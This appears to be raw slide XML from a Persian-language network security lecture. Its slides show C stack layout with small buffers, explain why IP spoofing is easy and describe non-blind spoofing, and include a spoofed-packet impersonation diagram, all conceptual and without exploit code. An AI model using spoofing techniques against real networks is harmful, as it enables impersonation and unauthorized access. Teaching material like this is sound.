            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRP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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>مثال</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="2438400"/>
            <a:ext cx="7162800" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> b, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> c){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	char buffer1[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	char buffer2[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	function(1,2,3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13317" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5116164" y="1524000"/>
            <a:ext cx="3550972" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="2800" dirty="0" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ساختمان </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2800" dirty="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پشته </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2800" dirty="0" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>براي برنامه زير:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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6</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Why IP Spoofing is easy?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem with the Routers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Routers look at Destination addresses only.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Authentication based on Source addresses only.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> To change source address field in IP header field is easy.</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rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Spoofing Attacks:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>There are a few variations on the types of attacks that using IP spoofing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Spoofing is classified into :-</a:t>
            </a:r>
            <a:endParaRPr lang="ar-JO" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>1.non-blind spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>This attack takes place when the attacker is on the same subnet as the target that could see sequence and acknowledgement of packets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="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US" b="1" smtClean="0"/>
              <a:t>Spoofing Attacks:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" b="1" smtClean="0">
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43011" name="Picture 3" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="5029200"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="Oval 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="2133600"/>
            <a:ext cx="1066800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>sender</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2895600"/>
            <a:ext cx="1874838" cy="1968500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1181"/>
              <a:gd name="T1" fmla="*/ 0 h 1240"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1181"/>
              <a:gd name="T10" fmla="*/ 0 h 1240"/>
              <a:gd name="T11" fmla="*/ 1181 w 1181"/>
              <a:gd name="T12" fmla="*/ 1240 h 1240"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1181" h="1240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="172" y="123"/>
                  <a:pt x="883" y="528"/>
                  <a:pt x="1032" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1181" y="942"/>
                  <a:pt x="924" y="1135"/>
                  <a:pt x="895" y="1240"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43014" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4572000" y="3352800"/>
            <a:ext cx="1143000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43015" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1993409">
            <a:off x="2971800" y="3138488"/>
            <a:ext cx="1974850" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>ip spoofed packet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43016" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="5638800"/>
            <a:ext cx="768350" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43017" name="Picture 9" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5519738" y="2316163"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43018" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5416550" y="2895600"/>
            <a:ext cx="908050" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>partner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="1979872">
            <a:off x="2590800" y="3429000"/>
            <a:ext cx="1752600" cy="609600"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1104" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43022" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2112" y="1824"/>
              <a:ext cx="1104" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>dst: victim</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43023" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2112" y="1632"/>
              <a:ext cx="1104" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>src: partner</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43020" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="5181600"/>
            <a:ext cx="2514600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 67931"/>
              <a:gd name="adj2" fmla="val -41986"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Oh, my partner sent me a packet. I’ll process this.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43021" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1524000"/>
            <a:ext cx="2057400" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>impersonation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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852488" y="228600"/>
            <a:ext cx="6840537" cy="731837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="87094" tIns="43547" rIns="87094" bIns="43547" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="865188">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP Spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6402388" y="3857625"/>
            <a:ext cx="0" cy="928688"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="3857625"/>
            <a:ext cx="0" cy="928688"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44037" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="3071813"/>
            <a:ext cx="0" cy="785812"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
